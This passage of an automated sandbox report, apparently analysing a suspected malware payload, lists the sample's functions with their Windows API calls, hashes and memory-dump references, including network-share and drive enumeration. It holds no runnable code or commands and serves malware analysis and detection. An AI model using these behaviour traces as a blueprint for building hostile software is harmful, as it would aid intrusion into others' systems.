                                                                                                        • Instruction ID: d0edd10374fbd2b04a3b07717554d99062ca34f37a3dafc09ee5408b7ee04a53
                                                                                                        • Opcode Fuzzy Hash: b58c232de9b3c6920899ffaec95b1b44c9c92ae0205e1dae3824fcc202232a73
                                                                                                        • Instruction Fuzzy Hash: C1110AB2A8122833ED30B1696C47FDB735D9B41731F0001A6FE0C97182E56A965561E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F2BAAD
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00F2BABE
                                                                                                        • UpdateWindow.USER32(00000000), ref: 00F2BAC5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                        • Opcode ID: 0c0d3cf59ca25efc9874f6298aa1b5203ff0e2fd775fe4b699eb1719762c54f0
                                                                                                        • Instruction ID: 656556434878a33a83f29fa8906d3c169d9c7d287aac0b043c1d02711a598f6a
                                                                                                        • Opcode Fuzzy Hash: 0c0d3cf59ca25efc9874f6298aa1b5203ff0e2fd775fe4b699eb1719762c54f0
                                                                                                        • Instruction Fuzzy Hash: E4E09A316C272576F2315B257C0AF963655B706F21F31405AFA407D2C486E96841DADC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00F20C12
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00F20C39
                                                                                                        • _memset.LIBCMT ref: 00F20C4C
                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00F20C63
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 364255426-0
                                                                                                        • Opcode ID: f674be0016ee49b5ec87b15710f97528f1e139a139e3cc688861dbd3c06126c0
                                                                                                        • Instruction ID: 614b04ef304044e59196c1b4a91d81f28cf4621f544f7edd5039005957690a10
                                                                                                        • Opcode Fuzzy Hash: f674be0016ee49b5ec87b15710f97528f1e139a139e3cc688861dbd3c06126c0
                                                                                                        • Instruction Fuzzy Hash: 6C91D576A083418FD728DF68D891B6BB7E1FFC4714F14891DF48A87282EB74A940DB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F516EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F51726
                                                                                                        • _strlen.LIBCMT ref: 00F51734
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • _strnlen.LIBCMT ref: 00F517BF
                                                                                                        • __lock.LIBCMT ref: 00F517D0
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F517DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2168648987-0
                                                                                                        • Opcode ID: 52f221c46194768ef5df1df29a4dc47dd32c118e3b44631fb4f4c6c95b03b85a
                                                                                                        • Instruction ID: 8fe45847a179d9a1e3c72d60b94104e8734e2bdf51909a82e2245d216d8f5fbb
                                                                                                        • Opcode Fuzzy Hash: 52f221c46194768ef5df1df29a4dc47dd32c118e3b44631fb4f4c6c95b03b85a
                                                                                                        • Instruction Fuzzy Hash: 59310832901615ABDB216B6CAC01B9F3694BF09B32F140115FE14EB181DB7CE90877E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00F20A75
                                                                                                        • SetErrorMode.KERNEL32(00000001,01010234,00000002), ref: 00F20AE2
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00F20AF9
                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F20B02
                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00F20B1B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                        • String ID:
                                                                                                        • API String ID: 2560635915-0
                                                                                                        • Opcode ID: 01e60ed292c15764f32963c7253d00b71392df2536b8461bbd712b59c535816f
                                                                                                        • Instruction ID: 4528dab7ec18181b1be229a1f4ce72e9b8f0e8b023a05a9e869841815360edb5
                                                                                                        • Opcode Fuzzy Hash: 01e60ed292c15764f32963c7253d00b71392df2536b8461bbd712b59c535816f
                                                                                                        • Instruction Fuzzy Hash: 084112725083409FC710DF68D885B0BBBE5FB89728F400A2DF085972A2DBB9C644CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F4B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F4B70B
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: HeapAlloc.KERNEL32(00C00000,00000000,00000001,?,?,?,?,00F33B69,?), ref: 00F30CA5
                                                                                                        • _free.LIBCMT ref: 00F4B71E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocHeap_free_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2734353464-0
                                                                                                        • Opcode ID: 5acffc6d3482853ac073a56d5e783a9bd2a65b3e8835ef4f35b714c81fb2c4bb
                                                                                                        • Instruction ID: e997774a2bc46a52020599e57a7869bdce1cf829744a2b7bc8fb9ca0b744b098
                                                                                                        • Opcode Fuzzy Hash: 5acffc6d3482853ac073a56d5e783a9bd2a65b3e8835ef4f35b714c81fb2c4bb
                                                                                                        • Instruction Fuzzy Hash: 4411A33280971AABDB313F74AC45B6A3F94AF84770F104626FC94A6152DB38D840B7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F2F085
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2F0AC
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2F0B6
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2F0C4
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F2F0D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: a44948d771143ea86287aa39d9e8f29fcb84e97e802f91f3d7cf2dc31bf4c040
                                                                                                        • Instruction ID: 9faf11597b1600051277c41f79166800a908067d39fcd4f0e2d40a96bcb3e2df
                                                                                                        • Opcode Fuzzy Hash: a44948d771143ea86287aa39d9e8f29fcb84e97e802f91f3d7cf2dc31bf4c040
                                                                                                        • Instruction Fuzzy Hash: FB01A731A5131D66EB309B65EC46F96376DBB48B10F604022FA00AF1C1D6B9A409DBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F2E515
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2E53C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2E546
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2E554
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F2E562
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 39ca21055d3ba7cffc330222f6bad985d8c4621294c76baf55d27e999f10a0ac
                                                                                                        • Instruction ID: 4e929cbdba2a881915f4357394389e67da8a0a3dfc07c0703552db4d8319d38c
                                                                                                        • Opcode Fuzzy Hash: 39ca21055d3ba7cffc330222f6bad985d8c4621294c76baf55d27e999f10a0ac
                                                                                                        • Instruction Fuzzy Hash: 0501F731B5031A76EA309B60EC46F967B6DA748B04F640011FA00EB0D1D6B9A409D7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F2FA53
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FA71
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2FA7B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FA89
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F2FA94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction ID: 0b5941db8a3e9ab7dc95ae4da6166710f1ccf100a1f9c23c847fb60c6870b0f8
                                                                                                        • Opcode Fuzzy Hash: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction Fuzzy Hash: 1301D631B50319B7EB209B64DC4AFA63B6DAB44B10F104021FA04AE1C1D7E5A804DAE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F2FE03
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FE21
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2FE2B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FE39
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F2FE44
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction ID: 1f30717d283c1dfa8883156ebd5d356ccb979f168ba00534c78f7a44760c5429
                                                                                                        • Opcode Fuzzy Hash: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction Fuzzy Hash: 4301A231A50319A7EB215B64AC4AFA63B6DAB44B10F004021FA00AE1D1D7E5A805D6E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F673F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                        • Opcode ID: 218050c5ed09510fca15dea428b7b7d474878d93d5e444f6633b35b8add61255
                                                                                                        • Instruction ID: faf36368b816c2b7db2699642c5e902e7cdd3be0df575f8a070333b9bf211c04
                                                                                                        • Opcode Fuzzy Hash: 218050c5ed09510fca15dea428b7b7d474878d93d5e444f6633b35b8add61255
                                                                                                        • Instruction Fuzzy Hash: 1981ACB2A0C7508FD710DF29D840A2BBBE5BFC8758F18095DF999A3212D735ED019B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F27BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 6c8d8af49d24de20e7742f5de8840626b7edbf69024c08df1d4a2f50f310f94a
                                                                                                        • Instruction ID: 20d4a139b1a498d84ca1bf7418397b5cd6f8bd7bec90050687a03bfab30a5ace
                                                                                                        • Opcode Fuzzy Hash: 6c8d8af49d24de20e7742f5de8840626b7edbf69024c08df1d4a2f50f310f94a
                                                                                                        • Instruction Fuzzy Hash: 2C51D9727083249FDB24EE2CEC80A6A77A6EF84710B24891DF855CB345DB31DC54EB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F24160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: a55db05f342a075af9c4e2ebf03b864ca221c71a10829b5c76f09da41166b564
                                                                                                        • Instruction ID: 80886920f2c0d735aeecfdd8dc9532419afbca31b0f023ae1cab7c165829d81c
                                                                                                        • Opcode Fuzzy Hash: a55db05f342a075af9c4e2ebf03b864ca221c71a10829b5c76f09da41166b564
                                                                                                        • Instruction Fuzzy Hash: 20310831700224DBDB28DE4DEC8192A77A6EF807107204A1CF865CB2C5D7B1FD40ABA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F6AE30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
